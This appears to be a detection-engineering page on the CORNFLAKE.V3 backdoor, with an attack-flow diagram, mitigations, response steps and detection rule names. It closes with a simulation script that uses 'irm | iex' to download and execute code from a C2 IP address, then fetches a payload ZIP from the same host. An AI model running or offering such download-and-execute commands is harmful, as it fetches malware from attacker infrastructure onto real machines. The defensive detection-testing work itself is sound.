Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report outlines a multi-stage intrusion chain that starts with compromised websites delivering a downloader tracked as ClickFix, which then installs the CORNFLAKE.V3 backdoor. Two financially motivated actors are implicated: UNC5518 (access-as-a-service) and UNC5774 (payload deployment). CORNFLAKE.V3 is delivered in Node.js and PHP variants, supports multiple payload formats, and persists via a Registry Run key. Once established, it performs host reconnaissance, steals credentials, and can fetch additional malware.
Investigation
Mandiant traced suspicious PowerShell execution that launched node.exe from a user AppData path using the -e argument. Investigators recovered the PowerShell dropper, the mechanism used to download the Node.js runtime, and the base64-encoded CORNFLAKE.V3 payload. The analysis documented Registry-based persistence, C2 behavior, and post-compromise actions including Active Directory enumeration and Kerberoasting. A related PHP variant was also identified using comparable tradecraft and associated with delivery of a WINDYTWIST.SEA backdoor.
Mitigation
Block or tightly control execution of unknown scripts initiated via the Windows Run dialog, and monitor PowerShell for download-and-execute patterns to suspicious domains or IP addresses. Alert on creation of anomalous Registry Run entries and on node.exe or php.exe running from AppData with script/inline arguments. Strengthen browser controls against clickjacking and SEO-poisoned CAPTCHA lures. Add network egress controls to limit outbound connections to untrusted Node.js/PHP runtime distribution sources.
Response
If detected, isolate the system, stop malicious PowerShell, node.exe, and php.exe processes, and remove the associated Registry persistence values. Collect dropped artifacts, relevant registry hives, and command-line histories for forensics. Rotate credentials impacted by Kerberoasting activity and hunt for lateral movement across the domain. Update detection content with the identified IOCs and TTP patterns.
graph TB %% Class definitions classDef technique fill:#ffcc99 classDef operator fill:#ff9900 %% Nodes initial_access[“<b>Technique</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Victim visits compromised site, copies PowerShell command and runs via Run dialog.”] class initial_access technique execution_ps[“<b>Technique</b> – <b>T1059.001 PowerShell</b><br/>PowerShell script performs anti‑VM checks, downloads Node.js runtime and Base64‑encoded CORNFLAKE.V3 JavaScript.”] class execution_ps technique defense_evasion[“<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payload delivered as Base64 string, saved with misleading extensions and XOR‑encrypted C2 traffic.”] class defense_evasion technique persistence[“<b>Technique</b> – <b>T1037.001 Logon Script</b><br/>Creates HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key (ChromeUpdater) pointing to node.exe -e \”<script>\”.”] class persistence technique discovery_sysinfo[“<b>Technique</b> – <b>T1082 System Information Discovery</b><br/>Collects OS version, privilege level, services, drives and ARP table.”] class discovery_sysinfo technique discovery_domain[“<b>Technique</b> – <b>T1069.002 Permission Groups Discovery</b> and <b>T1087.002 Account Discovery</b> and <b>T1482 Domain Trust Discovery</b><br/>Enumerates domain controllers, trusts, AD computers and privileged groups if domain‑joined.”] class discovery_domain technique credential_kerberoasting[“<b>Technique</b> – <b>T1558 Kerberoasting</b><br/>Batch script queries SPNs, requests service tickets, extracts hashes and exfiltrates them.”] class credential_kerberoasting technique c2_http[“<b>Technique</b> – <b>T1102 Web Service (HTTP)</b> with <b>T1132.002 Non‑Standard Encoding</b><br/>XOR‑encrypted payloads sent over HTTP POST to variable endpoints.”] class c2_http technique credential_ptt[“<b>Technique</b> – <b>T1550.003 Pass the Ticket</b><br/>Harvested Kerberos tickets are replayed to access additional resources.”] class credential_ptt technique %% Connections initial_access –>|leads_to| execution_ps execution_ps –>|enables| defense_evasion defense_evasion –>|enables| persistence persistence –>|enables| discovery_sysinfo discovery_sysinfo –>|enables| discovery_domain discovery_domain –>|leads_to| credential_kerberoasting credential_kerberoasting –>|uses| c2_http c2_http –>|enables| credential_ptt
Attack Flow
Detections
NodeJS Binary Executing From Uncommon Location (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Possible NodeJs Being Downloaded By Suspicious Process (via dns_query)
View
Possible System Enumeration (via cmdline)
View
Unusual Change Code Page Execution (via cmdline)
View
Suspicious Domain Trusts Discovery (via cmdline)
View
Possible System Network Configuration Discovery (via cmdline)
View
PHP Binary Executed Pointing To Suspicious Directory (via cmdline)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
IOCs (SourceIP) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor
View
IOCs (DestinationIP) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor
View
IOCs (HashSha256) to detect: A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor
View
Detection of CORNFLAKE.V3 Backdoor Deployment via PowerShell and Node.js [Windows Process Creation]
View
Detection of PowerShell-Based Malware Download and Execution [Windows Powershell]
View
Detection of Malicious PowerShell Command Execution for CORNFLAKE.V3 Deployment [Windows Powershell]
View
Detect Execution of CORNFLAKE.V3 Backdoor via Node.js [Windows Process Creation]
View
PowerShell Command Execution and VM Detection [Windows Powershell]
View
CORNFLAKE.V3 Backdoor Persistence via Registry Key [Windows Registry Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
The adversary has obtained a foothold on a compromised workstation and wishes to fetch a fresh payload from a remote C2 server while first confirming the environment is not a sandbox.- Environment Check (T1497.002): Query WMI for computer system details.
- Download & Execute (T1059.001): Use a single‑liner PowerShell command that constructs a time‑based URL, downloads the script via
Invoke‑RestMethod(irm), and pipes it toiex. - Secondary Artifact (T1059.003): Retrieve a ZIP file via
Invoke‑WebRequest(iwr) for later use.
-
Regression Test Script:
# ==== Step 1: Environment check (matches selection2) ==== Get-WmiObject Win32_ComputerSystem | Out-Null # ==== Step 2: Time‑based download‑and‑execute (matches selection1) ==== $u = [int64](([datetime]::UtcNow - [datetime]'1970-1-1').TotalSeconds) -band 0xfffffffffffffff0 # NOTE: The IP/port below is the same as in the rule; replace with a controlled test server if needed. irm 138.199.161.141:8080/$u | iex # ==== Step 3: ZIP download via iwr (matches selection3) ==== $ZipURL = "http://138.199.161.141:8080/payload.zip" $ZipFile = "$env:TEMPpayload.zip" iwr -Uri $ZipURL -OutFile $ZipFile -
Cleanup Commands:
# Remove the downloaded ZIP file Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue # Clear any residual variables Remove-Variable -Name u, ZipURL, ZipFile -ErrorAction SilentlyContinue